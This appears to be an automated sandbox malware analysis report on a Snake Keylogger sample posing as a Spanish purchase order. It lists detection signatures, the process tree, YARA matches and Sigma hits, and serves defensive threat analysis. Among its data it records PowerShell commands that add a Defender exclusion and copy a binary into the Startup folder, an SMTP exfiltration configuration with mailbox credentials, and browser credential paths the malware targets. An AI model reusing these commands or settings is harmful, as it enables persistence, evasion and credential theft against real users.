Edit tour

Windows Analysis Report
NUEVA ORDEN DE COMPRAsxlx..exe

Overview

General Information

Sample name:	NUEVA ORDEN DE COMPRAsxlx..exe
Analysis ID:	1447914
MD5:	9ab5f38a68ce1f4821c6d5ca8704eefd
SHA1:	b9c7e7a6c9db7710296ef2ee0f19f3af562c7707
SHA256:	e07e6330a6b7302b833d231f8b8e6fd1dd6c3d1ff5c5bb43c6d291ed61fe131e
Tags:	exe
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Copy file to startup via Powershell

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Creates executable files without a name

Disables UAC (registry)

Drops PE files to the startup folder

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

NUEVA ORDEN DE COMPRAsxlx..exe (PID: 7596 cmdline: "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" MD5: 9AB5F38A68CE1F4821C6D5CA8704EEFD)

conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force MD5: DFD66604CA0898E8E26DF7B1635B6326)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

CasPol.exe (PID: 7864 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

RegSvcs.exe (PID: 7924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

powershell.exe (PID: 8012 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)

conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

RegSvcs.exe (PID: 8160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7940 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 8052 cmdline: C:\Windows\system32\WerFault.exe -u -p 7596 -s 1620 MD5: 59550DE0393B1CDD584A1467D6D734E7)

.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "davin2024@gbogboro.com", "Password": "Lovelove@123", "Host": "mail.gbogboro.com", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1422193050.0000000005160000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4aeb5:$x1: In$J$ct0r
00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x565b3:$a1: get_encryptedPassword 0x76fe3:$a1: get_encryptedPassword 0x97803:$a1: get_encryptedPassword 0x568a9:$a2: get_encryptedUsername 0x772d9:$a2: get_encryptedUsername 0x97af9:$a2: get_encryptedUsername 0x563bf:$a3: get_timePasswordChanged 0x76def:$a3: get_timePasswordChanged 0x9760f:$a3: get_timePasswordChanged 0x564ba:$a4: get_passwordField 0x76eea:$a4: get_passwordField 0x9770a:$a4: get_passwordField 0x565c9:$a5: set_encryptedPassword 0x76ff9:$a5: set_encryptedPassword 0x97819:$a5: set_encryptedPassword 0x57bb0:$a7: get_logins 0x785e0:$a7: get_logins 0x98e00:$a7: get_logins 0x57b13:$a10: KeyLoggerEventArgs 0x78543:$a10: KeyLoggerEventArgs 0x98d63:$a10: KeyLoggerEventArgs
00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x59f50:$x1: $%SMTPDV$ 0x7a980:$x1: $%SMTPDV$ 0x9b1a0:$x1: $%SMTPDV$ 0x59fb4:$x2: $#TheHashHere%& 0x7a9e4:$x2: $#TheHashHere%& 0x9b204:$x2: $#TheHashHere%& 0x5b5cf:$x3: %FTPDV$ 0x7bfff:$x3: %FTPDV$ 0x9c81f:$x3: %FTPDV$ 0x5b6b9:$x4: $%TelegramDv$ 0x7c0e9:$x4: $%TelegramDv$ 0x9c909:$x4: $%TelegramDv$ 0x577ac:$x5: KeyLoggerEventArgs 0x57b13:$x5: KeyLoggerEventArgs 0x781dc:$x5: KeyLoggerEventArgs 0x78543:$x5: KeyLoggerEventArgs 0x989fc:$x5: KeyLoggerEventArgs 0x98d63:$x5: KeyLoggerEventArgs 0x5b5f3:$m2: Clipboard Logs ID 0x5b7b5:$m2: Screenshot Logs ID 0x5b881:$m2: keystroke Logs ID
00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148bb:$a1: get_encryptedPassword 0x14bb1:$a2: get_encryptedUsername 0x146c7:$a3: get_timePasswordChanged 0x147c2:$a4: get_passwordField 0x148d1:$a5: set_encryptedPassword 0x15eb8:$a7: get_logins 0x15e1b:$a10: KeyLoggerEventArgs 0x15ab4:$a11: KeyLoggerEventArgsEventHandler
00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18258:$x1: $%SMTPDV$ 0x182bc:$x2: $#TheHashHere%& 0x198d7:$x3: %FTPDV$ 0x199c1:$x4: $%TelegramDv$ 0x15ab4:$x5: KeyLoggerEventArgs 0x15e1b:$x5: KeyLoggerEventArgs 0x198fb:$m2: Clipboard Logs ID 0x19abd:$m2: Screenshot Logs ID 0x19b89:$m2: keystroke Logs ID 0x19a95:$m4: \SnakeKeylogger\
Process Memory Space: NUEVA ORDEN DE COMPRAsxlx..exe PID: 7596	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: NUEVA ORDEN DE COMPRAsxlx..exe PID: 7596	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegSvcs.exe PID: 7924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7924	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 7924	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7924	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8d7e3:$a1: get_encryptedPassword 0x8dacf:$a2: get_encryptedUsername 0x8d5f9:$a3: get_timePasswordChanged 0x8d6f4:$a4: get_passwordField 0x8d7f9:$a5: set_encryptedPassword 0x8fc31:$a7: get_logins 0x8fb94:$a10: KeyLoggerEventArgs 0x8f82d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7924	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x8f82d:$x5: KeyLoggerEventArgs 0x8fb94:$x5: KeyLoggerEventArgs 0x90482:$x5: KeyLoggerEventArgs 0x907b6:$x5: KeyLoggerEventArgs 0x91da6:$m2: Clipboard Logs ID 0x91e81:$m2: Screenshot Logs ID 0x91eb5:$m2: keystroke Logs ID 0x91e6d:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 8160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 8160	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 8160	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x460dc:$a1: get_encryptedPassword 0x463c8:$a2: get_encryptedUsername 0x45ef2:$a3: get_timePasswordChanged 0x45fed:$a4: get_passwordField 0x460f2:$a5: set_encryptedPassword 0x4852a:$a7: get_logins 0x4848d:$a10: KeyLoggerEventArgs 0x48126:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 8160	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x48126:$x5: KeyLoggerEventArgs 0x4848d:$x5: KeyLoggerEventArgs 0x48d7b:$x5: KeyLoggerEventArgs 0x490af:$x5: KeyLoggerEventArgs 0x4a69f:$m2: Clipboard Logs ID 0x4a77a:$m2: Screenshot Logs ID 0x4a7ae:$m2: keystroke Logs ID 0x4a766:$m4: \SnakeKeylogger\
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.RegSvcs.exe.3a94698.3.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x490b5:$x1: In$J$ct0r
9.2.RegSvcs.exe.5160000.6.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4aeb5:$x1: In$J$ct0r
9.2.RegSvcs.exe.3a94698.3.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4aeb5:$x1: In$J$ct0r
9.2.RegSvcs.exe.2a55230.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xcace0:$x1: In$J$ct0r 0xcbc04:$a1: WriteProcessMemory 0xcbc90:$a1: WriteProcessMemory 0xcbd64:$a4: VirtualAllocEx 0xcbf88:$a4: VirtualAllocEx 0xcc008:$a4: VirtualAllocEx 0xf900:$s3: net.pipe
9.2.RegSvcs.exe.5160000.6.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x490b5:$x1: In$J$ct0r
16.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
16.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14abb:$a1: get_encryptedPassword 0x14db1:$a2: get_encryptedUsername 0x148c7:$a3: get_timePasswordChanged 0x149c2:$a4: get_passwordField 0x14ad1:$a5: set_encryptedPassword 0x160b8:$a7: get_logins 0x1601b:$a10: KeyLoggerEventArgs 0x15cb4:$a11: KeyLoggerEventArgsEventHandler
16.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3df:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b611:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba44:$a4: \Orbitum\User Data\Default\Login Data 0x1ca83:$a5: \Kometa\User Data\Default\Login Data
16.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15658:$s1: UnHook 0x1565f:$s2: SetHook 0x15667:$s3: CallNextHook 0x15674:$s4: _hook
16.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18458:$x1: $%SMTPDV$ 0x184bc:$x2: $#TheHashHere%& 0x19ad7:$x3: %FTPDV$ 0x19bc1:$x4: $%TelegramDv$ 0x15cb4:$x5: KeyLoggerEventArgs 0x1601b:$x5: KeyLoggerEventArgs 0x19afb:$m2: Clipboard Logs ID 0x19cbd:$m2: Screenshot Logs ID 0x19d89:$m2: keystroke Logs ID 0x19c95:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.3b49528.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.3b49528.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.3b49528.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12cbb:$a1: get_encryptedPassword 0x12fb1:$a2: get_encryptedUsername 0x12ac7:$a3: get_timePasswordChanged 0x12bc2:$a4: get_passwordField 0x12cd1:$a5: set_encryptedPassword 0x142b8:$a7: get_logins 0x1421b:$a10: KeyLoggerEventArgs 0x13eb4:$a11: KeyLoggerEventArgsEventHandler
9.2.RegSvcs.exe.3b49528.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5df:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19811:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c44:$a4: \Orbitum\User Data\Default\Login Data 0x1ac83:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.3b49528.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13858:$s1: UnHook 0x1385f:$s2: SetHook 0x13867:$s3: CallNextHook 0x13874:$s4: _hook
9.2.RegSvcs.exe.3b49528.5.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16658:$x1: $%SMTPDV$ 0x166bc:$x2: $#TheHashHere%& 0x17cd7:$x3: %FTPDV$ 0x17dc1:$x4: $%TelegramDv$ 0x13eb4:$x5: KeyLoggerEventArgs 0x1421b:$x5: KeyLoggerEventArgs 0x17cfb:$m2: Clipboard Logs ID 0x17ebd:$m2: Screenshot Logs ID 0x17f89:$m2: keystroke Logs ID 0x17e95:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.3b28af8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.3b28af8.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.3b28af8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12cbb:$a1: get_encryptedPassword 0x12fb1:$a2: get_encryptedUsername 0x12ac7:$a3: get_timePasswordChanged 0x12bc2:$a4: get_passwordField 0x12cd1:$a5: set_encryptedPassword 0x142b8:$a7: get_logins 0x1421b:$a10: KeyLoggerEventArgs 0x13eb4:$a11: KeyLoggerEventArgsEventHandler
9.2.RegSvcs.exe.3b28af8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5df:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19811:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c44:$a4: \Orbitum\User Data\Default\Login Data 0x1ac83:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.3b28af8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13858:$s1: UnHook 0x1385f:$s2: SetHook 0x13867:$s3: CallNextHook 0x13874:$s4: _hook
9.2.RegSvcs.exe.3b28af8.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16658:$x1: $%SMTPDV$ 0x166bc:$x2: $#TheHashHere%& 0x17cd7:$x3: %FTPDV$ 0x17dc1:$x4: $%TelegramDv$ 0x13eb4:$x5: KeyLoggerEventArgs 0x1421b:$x5: KeyLoggerEventArgs 0x17cfb:$m2: Clipboard Logs ID 0x17ebd:$m2: Screenshot Logs ID 0x17f89:$m2: keystroke Logs ID 0x17e95:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.3b28af8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.3b28af8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.3b28af8.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.3b28af8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14abb:$a1: get_encryptedPassword 0x354eb:$a1: get_encryptedPassword 0x55d0b:$a1: get_encryptedPassword 0x14db1:$a2: get_encryptedUsername 0x357e1:$a2: get_encryptedUsername 0x56001:$a2: get_encryptedUsername 0x148c7:$a3: get_timePasswordChanged 0x352f7:$a3: get_timePasswordChanged 0x55b17:$a3: get_timePasswordChanged 0x149c2:$a4: get_passwordField 0x353f2:$a4: get_passwordField 0x55c12:$a4: get_passwordField 0x14ad1:$a5: set_encryptedPassword 0x35501:$a5: set_encryptedPassword 0x55d21:$a5: set_encryptedPassword 0x160b8:$a7: get_logins 0x36ae8:$a7: get_logins 0x57308:$a7: get_logins 0x1601b:$a10: KeyLoggerEventArgs 0x36a4b:$a10: KeyLoggerEventArgs 0x5726b:$a10: KeyLoggerEventArgs
9.2.RegSvcs.exe.3b28af8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3df:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce0f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d62f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b611:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c041:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c861:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba44:$a4: \Orbitum\User Data\Default\Login Data 0x3c474:$a4: \Orbitum\User Data\Default\Login Data 0x5cc94:$a4: \Orbitum\User Data\Default\Login Data 0x1ca83:$a5: \Kometa\User Data\Default\Login Data 0x3d4b3:$a5: \Kometa\User Data\Default\Login Data 0x5dcd3:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.3b28af8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15658:$s1: UnHook 0x36088:$s1: UnHook 0x568a8:$s1: UnHook 0x1565f:$s2: SetHook 0x3608f:$s2: SetHook 0x568af:$s2: SetHook 0x15667:$s3: CallNextHook 0x36097:$s3: CallNextHook 0x568b7:$s3: CallNextHook 0x15674:$s4: _hook 0x360a4:$s4: _hook 0x568c4:$s4: _hook
9.2.RegSvcs.exe.3b28af8.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18458:$x1: $%SMTPDV$ 0x38e88:$x1: $%SMTPDV$ 0x596a8:$x1: $%SMTPDV$ 0x184bc:$x2: $#TheHashHere%& 0x38eec:$x2: $#TheHashHere%& 0x5970c:$x2: $#TheHashHere%& 0x19ad7:$x3: %FTPDV$ 0x3a507:$x3: %FTPDV$ 0x5ad27:$x3: %FTPDV$ 0x19bc1:$x4: $%TelegramDv$ 0x3a5f1:$x4: $%TelegramDv$ 0x5ae11:$x4: $%TelegramDv$ 0x15cb4:$x5: KeyLoggerEventArgs 0x1601b:$x5: KeyLoggerEventArgs 0x366e4:$x5: KeyLoggerEventArgs 0x36a4b:$x5: KeyLoggerEventArgs 0x56f04:$x5: KeyLoggerEventArgs 0x5726b:$x5: KeyLoggerEventArgs 0x19afb:$m2: Clipboard Logs ID 0x19cbd:$m2: Screenshot Logs ID 0x19d89:$m2: keystroke Logs ID
9.2.RegSvcs.exe.3b49528.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.3b49528.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.3b49528.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.3b49528.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14abb:$a1: get_encryptedPassword 0x352db:$a1: get_encryptedPassword 0x14db1:$a2: get_encryptedUsername 0x355d1:$a2: get_encryptedUsername 0x148c7:$a3: get_timePasswordChanged 0x350e7:$a3: get_timePasswordChanged 0x149c2:$a4: get_passwordField 0x351e2:$a4: get_passwordField 0x14ad1:$a5: set_encryptedPassword 0x352f1:$a5: set_encryptedPassword 0x160b8:$a7: get_logins 0x368d8:$a7: get_logins 0x1601b:$a10: KeyLoggerEventArgs 0x3683b:$a10: KeyLoggerEventArgs 0x15cb4:$a11: KeyLoggerEventArgsEventHandler 0x364d4:$a11: KeyLoggerEventArgsEventHandler
9.2.RegSvcs.exe.3b49528.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3df:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cbff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b611:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be31:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba44:$a4: \Orbitum\User Data\Default\Login Data 0x3c264:$a4: \Orbitum\User Data\Default\Login Data 0x1ca83:$a5: \Kometa\User Data\Default\Login Data 0x3d2a3:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.3b49528.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15658:$s1: UnHook 0x35e78:$s1: UnHook 0x1565f:$s2: SetHook 0x35e7f:$s2: SetHook 0x15667:$s3: CallNextHook 0x35e87:$s3: CallNextHook 0x15674:$s4: _hook 0x35e94:$s4: _hook
9.2.RegSvcs.exe.3b49528.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18458:$x1: $%SMTPDV$ 0x38c78:$x1: $%SMTPDV$ 0x184bc:$x2: $#TheHashHere%& 0x38cdc:$x2: $#TheHashHere%& 0x19ad7:$x3: %FTPDV$ 0x3a2f7:$x3: %FTPDV$ 0x19bc1:$x4: $%TelegramDv$ 0x3a3e1:$x4: $%TelegramDv$ 0x15cb4:$x5: KeyLoggerEventArgs 0x1601b:$x5: KeyLoggerEventArgs 0x364d4:$x5: KeyLoggerEventArgs 0x3683b:$x5: KeyLoggerEventArgs 0x19afb:$m2: Clipboard Logs ID 0x19cbd:$m2: Screenshot Logs ID 0x19d89:$m2: keystroke Logs ID 0x3a31b:$m2: Clipboard Logs ID 0x3a4dd:$m2: Screenshot Logs ID 0x3a5a9:$m2: keystroke Logs ID 0x19c95:$m4: \SnakeKeylogger\ 0x3a4b5:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.2a57a70.2.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xc84a0:$x1: In$J$ct0r 0xc93c4:$a1: WriteProcessMemory 0xc9450:$a1: WriteProcessMemory 0xc9524:$a4: VirtualAllocEx 0xc9748:$a4: VirtualAllocEx 0xc97c8:$a4: VirtualAllocEx 0xd0c0:$s3: net.pipe
Click to see the 35 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe", ParentImage: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe, ParentProcessId: 7596, ParentProcessName: NUEVA ORDEN DE COMPRAsxlx..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force, ProcessId: 7812, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

